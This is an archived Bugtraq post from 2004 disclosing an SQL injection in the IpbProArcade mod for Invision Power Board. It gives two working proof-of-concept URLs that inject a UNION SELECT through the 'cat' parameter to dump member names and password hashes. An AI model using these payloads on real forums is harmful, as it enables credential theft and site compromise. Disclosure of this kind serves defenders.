Bugtraq mailing list archives
IpbProArace 2.5.x SQL injection.
From: axl daivy <axlownz () gmail com>
Date: 20 Nov 2004 20:05:53 -0000
i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x and 2.x) the vuln exists in the "category" field. buy using this field it is possible to inject any sql query and compemise the entire forum system p.o.c for ipb 1.x http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* for ipb 2.x index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* discovered by Axl credit goes to HLL for Helping me write the actual exploit greetz to CereBrums And JonJon cheers Axl
Current thread:
- IpbProArace 2.5.x SQL injection. axl daivy (Nov 20)